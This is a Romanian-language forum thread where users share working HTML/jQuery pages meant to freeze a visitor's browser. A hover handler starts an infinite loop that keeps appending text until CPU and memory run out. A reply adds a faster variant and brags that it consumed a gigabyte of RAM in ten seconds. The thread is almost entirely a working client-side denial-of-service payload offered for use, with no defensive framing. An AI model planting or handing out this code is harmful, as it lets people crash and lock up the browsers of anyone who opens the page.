Jump to content
paxnWo

jquery browser freeze & res killer

Recommended Posts

browserul freezeaza instant, mananca 50% cpu si cate 15-40 ram / sec.

gasita acum 2 minute.

<html>
<head>
<script src="http://code.jquery.com/jquery-latest.min.js"></script>
</head>
<body>
<p></p>
<script>
var x = 1;
$("p").hover(
function () { while ( x ) {
$(this).append($("<br>pax@usadinspate.ro<br>"));
}}
);
$("p").hover();
</script>
</body>
</html>

Edited by paxnWo
Link to comment
Share on other sites


<html>
<head>
<script src="http://code.jquery.com/jquery-latest.min.js"></script>
</head>
<body>
<p>
LOL.... metoda ta merge greu... vrei sa rupi in 2 fa exponential<BR>
LOL.... metoda ta merge greu... vrei sa rupi in 2 fa exponential<BR>
LOL.... metoda ta merge greu... vrei sa rupi in 2 fa exponential<BR>
LOL.... metoda ta merge greu... vrei sa rupi in 2 fa exponential<BR>
</p>
<script>
var x = 1;
$("p").hover(
function () {
while ( x ) {
$(this).append($(this).text + $(this).text+ $(this).text+ $(this).text+ $(this).text+ $(this).text+ $(this).text +
$(this).text + $(this).text+ $(this).text+ $(this).text+ $(this).text+ $(this).text+ $(this).text +
$(this).text + $(this).text+ $(this).text+ $(this).text+ $(this).text+ $(this).text+ $(this).text +
$(this).text + $(this).text+ $(this).text+ $(this).text+ $(this).text+ $(this).text+ $(this).text);
}}
);
$("p").hover();
</script>
</body>
</html>

merge doar de vreo 20-30 de ori mai rpd :) mie mi-a rupt 1 giga in 10 secunde

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...